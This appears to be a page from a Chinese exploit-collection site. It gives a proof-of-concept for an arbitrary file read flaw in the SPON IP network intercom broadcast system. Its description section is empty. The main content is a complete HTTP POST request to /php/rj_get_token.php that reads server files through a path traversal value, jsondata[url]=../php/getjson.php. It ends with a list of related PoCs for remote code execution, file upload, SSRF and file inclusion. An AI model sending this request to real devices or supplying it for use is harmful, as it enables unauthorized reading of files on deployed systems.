SPON IP网络对讲广播系统 /php/rj_get_token.php 任意文件读取漏洞

漏洞描述

PoC代码

POST /php/rj_get_token.php HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36

jsondata[url]=../php/getjson.php

相关漏洞推荐

• spon-ip-intercom-file-read: Spon Ip Intercom File Read
• spon-ip-intercom-ping-rce: Hikvision SPON IP网络对讲广播系统存在命令执行漏洞
• POC CVE-2018-14728: Responsive filemanager 9.13.1 Server-Side Request Forgery
• POC CVE-2018-15535: Responsive FileManager <9.13.4 - Local File Inclusion
• POC CVE-2018-8823: PrestaShop Responsive Mega Menu Module - Remote Code Execution
• POC CVE-2021-24947: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read
• POC CVE-2018-1000600: Pre-auth Fully-responded SSRF
• POC response-ssrf: Full Response SSRF Detection
• POC getresponse-takeover: Getresponse Takeover Detection
• POC sponip-network-system-ping-rce: Sponip Network System Ping - Remote Code Execution
• POC 世邦通信SPON-IP网络对讲广播系统 /php/videobacktrackpush.php 文件上传漏洞
• POC 世邦通信SPON-IP网络对讲广播系统videobacktrackpush.php函数任意文件上传漏洞
• code-projects Responsive Hotel Site 注入漏洞